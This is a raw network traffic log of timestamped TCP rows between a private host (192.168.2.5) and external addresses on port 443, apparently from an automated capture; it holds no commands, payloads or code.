Dec 27, 2024 07:10:52.663072109 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.663167953 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.663336992 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.663450956 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.663479090 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.663535118 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.663671970 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.663729906 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.668162107 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.668302059 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.668349981 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.711332083 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.742773056 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.742906094 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.742947102 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.743096113 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.743247032 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.743294001 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.743453026 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.743557930 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.744070053 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.744329929 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.744441986 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.744499922 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.744539976 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.744545937 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.744627953 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.744760990 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.744898081 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.744999886 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.745671034 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.745853901 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.745964050 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.746053934 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.746289968 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.746413946 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.746491909 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.748565912 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.748678923 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.748744965 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.748861074 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.749020100 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.749152899 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.749293089 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.749408007 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.791348934 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.861907959 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.862091064 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.862210989 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.862704992 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.862728119 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.862806082 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.863034964 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.863234997 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.864754915 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.866923094 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.867424011 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.868108034 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.868156910 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.868201971 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.868222952 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.868232012 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.868259907 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.868294001 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.868331909 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.868472099 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.872415066 CET	50053	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:52.872452974 CET	443	50053	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:52.873059988 CET	50053	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:52.873950005 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.873960018 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.874038935 CET	50053	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:52.874049902 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874053955 CET	443	50053	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:52.874061108 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.874077082 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874083042 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.874099016 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874103069 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.874110937 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874119997 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.874138117 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874142885 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.874159098 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874165058 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.874182940 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874182940 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874188900 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.874193907 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.874206066 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874209881 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.874227047 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874233007 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.874244928 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874288082 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874295950 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874306917 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874340057 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874361992 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874375105 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874393940 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874437094 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874454021 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.874892950 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.876749039 CET	50054	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:52.876770973 CET	443	50054	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:52.877077103 CET	50054	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:52.877418041 CET	50054	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:52.877430916 CET	443	50054	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:52.902230024 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.902436018 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902451038 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.902462959 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902477026 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902510881 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902518988 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902529955 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902530909 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.902553082 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902565002 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.902592897 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902601957 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902610064 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902645111 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902666092 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.902674913 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902692080 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902724981 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902725935 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902770996 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902777910 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902791023 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.902792931 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902823925 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.902827978 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902843952 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902879953 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902895927 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902928114 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.902932882 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902941942 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902959108 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902970076 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902973890 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.902986050 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.902995110 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.903007030 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.903043985 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.903060913 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.903079033 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.903268099 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.903279066 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.903548956 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.903641939 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.903687000 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.903712988 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.903719902 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.903737068 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.903774023 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.903779984 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.903791904 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.903805971 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.903825045 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.903867006 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.947349072 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.947518110 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.947550058 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.947601080 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.947618008 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.947650909 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.947669983 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.947714090 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.947726011 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.947798967 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.981688976 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.981863022 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.981873989 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.981945038 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.981960058 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.982016087 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.982021093 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.982049942 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.982060909 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.982086897 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.982110977 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.982209921 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.982218027 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.982218027 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.982232094 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.982250929 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.982258081 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.982258081 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.982264996 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.982279062 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.982290030 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.982297897 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.982346058 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:52.982356071 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.982395887 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.982522011 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.983251095 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.984977007 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:52.988482952 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.004162073 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.004183054 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.004206896 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.004240990 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.004245996 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.004256964 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.004261017 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.004384041 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.004806042 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.004812956 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.004843950 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.004879951 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.004899025 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.004905939 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.004920006 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.004987001 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005017996 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005017996 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.005044937 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005044937 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.005120039 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005156040 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005175114 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.005294085 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005300999 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.005342007 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005348921 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.005377054 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005423069 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.005482912 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005495071 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.005513906 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005563974 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.005614996 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005626917 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.005667925 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005693913 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.005711079 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005719900 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.005784035 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005789995 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005806923 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005825996 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.005851030 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005857944 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.005868912 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005897045 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.005923986 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.006146908 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006160021 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.006270885 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006278038 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.006289959 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006300926 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006314993 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006386995 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.006416082 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006427050 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.006489038 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006501913 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006506920 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.006515980 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006534100 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006536007 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.006546021 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006593943 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006604910 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006618023 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006633043 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006663084 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006696939 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006704092 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006725073 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006746054 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006781101 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006807089 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006850958 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006917953 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006928921 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006947041 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006953955 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006970882 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006979942 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.006994009 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.007035017 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.007066011 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.007105112 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.007138968 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.007170916 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.007252932 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.007293940 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.007349968 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.007364035 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.007420063 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.007462025 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.007499933 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.007504940 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.007510900 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.043760061 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.043947935 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.043967962 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.043982029 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.043998003 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.043998003 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.044008970 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.044022083 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.044027090 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.044056892 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.044267893 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.044307947 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.044311047 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.044341087 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.044435024 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.044531107 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.044657946 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.044759035 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.044864893 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.044997931 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.050632000 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.095324039 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.100789070 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.100914001 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.100986004 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.101227999 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.101351023 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.101429939 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.101471901 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.101653099 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.144104004 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.144269943 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.144392967 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.144485950 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.144750118 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.144867897 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.144999027 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.145149946 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.145453930 CET	50043	443	192.168.2.5	188.245.216.205
